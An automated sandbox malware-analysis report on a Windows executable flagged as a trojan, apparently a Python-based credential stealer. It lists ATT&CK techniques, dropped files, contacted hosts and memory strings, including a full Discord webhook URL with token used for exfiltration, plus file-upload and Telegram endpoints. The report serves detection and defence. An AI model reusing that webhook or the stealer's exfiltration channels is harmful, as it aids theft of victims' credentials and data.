File source: Process Memory Space: sppawx.exe PID: 7860, type: MEMORYSTR

Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD27507C bind,		2_2_00007FFEDD27507C
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD276080 listen,		2_2_00007FFEDD276080

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 File and Directory Permissions Modification	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	2 Registry Run Keys / Startup Folder	1 Access Token Manipulation	4 Disable or Modify Tools	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	1 System Shutdown/Reboot
Email Addresses	DNS Server	Domain Accounts	122 Command and Scripting Interpreter	Logon Script (Windows)	11 Process Injection	11 Deobfuscate/Decode Files or Information	Security Account Manager	49 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	2 Registry Run Keys / Startup Folder	21 Obfuscated Files or Information	NTDS	251 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	141 Virtualization/Sandbox Evasion	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
sppawx.exe	37%	ReversingLabs	Win64.Trojan.Znyonm

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI78082\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78082\_bz2.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78082\_ctypes.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78082\_decimal.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78082\_hashlib.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78082\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78082\_queue.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78082\_socket.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78082\_sqlite3.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78082\_ssl.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78082\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78082\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78082\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78082\python312.dll	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78082\select.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78082\sqlite3.dll	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI78082\unicodedata.pyd	4%	ReversingLabs

Name	IP	Active	Malicious
discord.com	162.159.135.232	true	true
ip-api.com	208.95.112.1	true	true
blank-jfr1z.in	unknown	unknown	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG	true

URLs from Memory and Binaries

Name	Source	Malicious
http://ns.adobe.hotosh	powershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmp	false
https://duckduckgo.com/chrome_newtab	sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Blank-c/BlankOBF	sppawx.exe, 00000002.00000003.1318450801.0000018C7F336000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1318293950.0000018C7F3A2000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1318879940.0000018C7F3C8000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1319218190.0000018C7F3CF000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1318366035.0000018C7F334000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1318569360.0000018C01C1A000.00000004.00000020.00020000.00000000.sdmp	false
https://www.avito.ru/	sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmp	false
https://duckduckgo.com/ac/?q=	sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmp	false
http://ns.adobe.c.0/ti	powershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmp	false
https://api.telegram.org/bot	sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	false
https://www.ctrip.com/	sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F090000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303336817.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	false
https://www.leboncoin.fr/	sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	false
https://tools.ietf.org/html/rfc2388#section-4.4	sppawx.exe, 00000002.00000002.1748349929.0000018C7F317000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	sppawx.exe, 00000002.00000002.1748026153.0000018C7F0B2000.00000004.00000020.00020000.00000000.sdmp	false
https://weibo.com/	sppawx.exe, 00000002.00000002.1746430268.0000018C02560000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	false
https://api.anonfiles.com/upload	sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	false
https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPs	sppawx.exe, 00000002.00000002.1745991860.0000018C01D70000.00000004.00001000.00020000.00000000.sdmp	true
https://www.msn.com	sppawx.exe, 00000002.00000002.1746430268.0000018C02574000.00000004.00001000.00020000.00000000.sdmp	false
https://nuget.org/nuget.exe	powershell.exe, 0000000B.00000002.1419951585.000002724448A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1597118596.000001AF4C7D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1539735870.000001AF3E1B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1597118596.000001AF4C91B000.00000004.00000800.00020000.00000000.sdmp	false
https://discord.com/api/v9/users/	sppawx.exe, 00000002.00000002.1748216532.0000018C7F190000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	sppawx.exe, 00000002.00000002.1745991860.0000018C01DDC000.00000004.00001000.00020000.00000000.sdmp	false
http://cacerts.digi	sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	false
https://peps.python.org/pep-0205/	sppawx.exe, 00000002.00000002.1748216532.0000018C7F190000.00000004.00001000.00020000.00000000.sdmp	false
https://www.reddit.com/	sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	false
https://support.mozilla.org/kb/custoU	sppawx.exe, 00000002.00000003.1452445176.0000018C7F841000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1444563764.0000018C7F840000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000B.00000002.1393896936.0000027234411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1539735870.000001AF3C761000.00000004.00000800.00020000.00000000.sdmp	false
https://www.amazon.ca/	sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1747645212.0000018C7ECE0000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	false
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	sppawx.exe, 00000002.00000002.1746134120.0000018C01E80000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	sppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	false
https://www.ebay.co.uk/	sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmp	false
http://ns.adoraw-se	powershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmp	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000044.00000002.1539735870.000001AF3E042000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000B.00000002.1393896936.0000027234638000.00000004.00000800.00020000.00000000.sdmp	false
https://www.ebay.de/	sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000044.00000002.1539735870.000001AF3E042000.00000004.00000800.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code	sppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	false
https://go.micro	powershell.exe, 00000044.00000002.1539735870.000001AF3D638000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F090000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303336817.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	false
https://www.amazon.com/	sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/python/cpython/issues/86361.	sppawx.exe, 00000002.00000002.1747473298.0000018C7E7B1000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.mic	powershell.exe, 0000000B.00000002.1432087978.000002724CBE4000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/Icon	powershell.exe, 00000044.00000002.1597118596.000001AF4C91B000.00000004.00000800.00020000.00000000.sdmp	false
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmp	false
https://httpbin.org/	sppawx.exe, 00000002.00000003.1617821988.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	false
http://www.microsoftISPLA~1.PNGy./	sppawx.exe, 00000002.00000002.1748781914.0000018C7F698000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module	sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1747906532.0000018C7EF90000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches	sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1747906532.0000018C7EF90000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	false
https://www.ecosia.org/newtab/	sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	sppawx.exe, 00000002.00000003.1452445176.0000018C7F89E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1464786245.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1492204812.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp	false
https://www.youtube.com/	sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmp	false
https://allegro.pl/	sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/Pester/Pester	powershell.exe, 00000044.00000002.1539735870.000001AF3E042000.00000004.00000800.00020000.00000000.sdmp	false
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	sppawx.exe, 00000002.00000002.1748349929.0000018C7F296000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F090000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303336817.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	false
https://MD8.mozilla.org/1/m	sppawx.exe, 00000002.00000002.1746430268.0000018C02574000.00000004.00001000.00020000.00000000.sdmp	false
https://www.python.org/psf/license/	sppawx.exe, 00000002.00000002.1754174414.00007FFEDE022000.00000040.00000001.01000000.00000004.sdmp	false
https://www.bbc.co.uk/	sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	false
https://bugzilla.mo	sppawx.exe, 00000002.00000002.1746430268.0000018C02568000.00000004.00001000.00020000.00000000.sdmp	false
http://tools.ietf.org/html/rfc6125#section-6.4.3	sppawx.exe, 00000002.00000002.1746134120.0000018C01E80000.00000004.00001000.00020000.00000000.sdmp	false
https://support.mozilla.org/products/firefoxgro.allizom.troppus.Qb0WswhkLhoa	sppawx.exe, 00000002.00000003.1464786245.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1492204812.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000B.00000002.1393896936.0000027234638000.00000004.00000800.00020000.00000000.sdmp	false
https://google.com/mail	sppawx.exe, 00000002.00000003.1740170260.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617193305.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1484130042.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1744930553.0000018C014AB000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469818072.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1749404493.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1515784101.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1450803284.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1495682186.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1743024456.0000018C7F727000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1465225633.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp	false
https://packaging.python.org/specifications/entry-points/	sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1745892024.0000018C01C50000.00000004.00001000.00020000.00000000.sdmp	false
https://www.python.org/psf/license/)	sppawx.exe, 00000002.00000002.1754174414.00007FFEDDF24000.00000040.00000001.01000000.00000004.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	false
https://www.google.com/	sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmp	false
https://www.iqiyi.com/	sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	false
https://foss.heptapod.net/pypy/pypy/-/issues/3539	sppawx.exe, 00000002.00000002.1745991860.0000018C01DDC000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	sppawx.exe, 00000002.00000002.1744930553.0000018C014AB000.00000004.00000020.00020000.00000000.sdmp	false
http://google.com/	sppawx.exe, 00000002.00000003.1451486952.0000018C7F704000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748781914.0000018C7F698000.00000004.00000020.00020000.00000000.sdmp	false
http://ns.photo/	powershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmp	false
http://ns.a.0/sTy	powershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmp	false
http://ocsp.sectigo.com0	sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	false
https://tools.ietf.org/html/rfc7231#section-4.3.6)	sppawx.exe, 00000002.00000002.1748349929.0000018C7F296000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1324714906.0000018C7F2F3000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1325603169.0000018C7F291000.00000004.00000020.00020000.00000000.sdmp	false
https://www.python.org/download/releases/2.3/mro/.	sppawx.exe, 00000002.00000002.1747645212.0000018C7ECE0000.00000004.00001000.00020000.00000000.sdmp	false
https://contoso.com/License	powershell.exe, 00000044.00000002.1597118596.000001AF4C91B000.00000004.00000800.00020000.00000000.sdmp	false
https://discordapp.com/api/v9/users/	sppawx.exe, 00000002.00000002.1748216532.0000018C7F190000.00000004.00001000.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source	sppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	false
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec	sppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2920	sppawx.exe, 00000002.00000003.1517272348.0000018C7F6B9000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1452098509.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748973373.0000018C7F6BA000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617821988.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp	false
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data	sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F090000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303336817.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmp	false
https://yahoo.com/	sppawx.exe, 00000002.00000003.1740170260.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617193305.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1484130042.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1744930553.0000018C014AB000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469818072.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1749404493.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1515784101.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1450803284.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1495682186.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1743024456.0000018C7F727000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1465225633.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp	false
https://account.bellmedia.c	sppawx.exe, 00000002.00000002.1746430268.0000018C02544000.00000004.00001000.00020000.00000000.sdmp	false
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	sppawx.exe, 00000002.00000002.1748349929.0000018C7F296000.00000004.00000020.00020000.00000000.sdmp	false
https://login.microsoftonline.com	sppawx.exe, 00000002.00000002.1746430268.0000018C025D8000.00000004.00001000.00020000.00000000.sdmp	false
http://cacerts.digicert.co	sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.thawte.com/ThawteTimestampingCA.crl0	sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp	false
https://html.spec.whatwg.org/multipage/	sppawx.exe, 00000002.00000003.1517272348.0000018C7F6B9000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1452098509.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748973373.0000018C7F6BA000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617821988.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp	false
https://www.ifeng.com/	sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp	false
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	sppawx.exe, 00000002.00000002.1745991860.0000018C01D70000.00000004.00001000.00020000.00000000.sdmp	false
https://www.zhihu.com/	sppawx.exe, 00000002.00000002.1746430268.0000018C02560000.00000004.00001000.00020000.00000000.sdmp	false
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmp	false
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	sppawx.exe, 00000002.00000003.1451486952.0000018C7F704000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1744930553.0000018C01430000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/	powershell.exe, 00000044.00000002.1597118596.000001AF4C91B000.00000004.00000800.00020000.00000000.sdmp	false
https://oneget.orgX	powershell.exe, 00000044.00000002.1539735870.000001AF3DD64000.00000004.00000800.00020000.00000000.sdmp	false
http://crl.comodx	sppawx.exe, 00000002.00000002.1748973373.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1744275263.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp	false
https://api.gofile.io/getServer	sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	true
162.159.135.232	discord.com	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574325
Start date and time:	2024-12-13 08:37:00 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	125
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
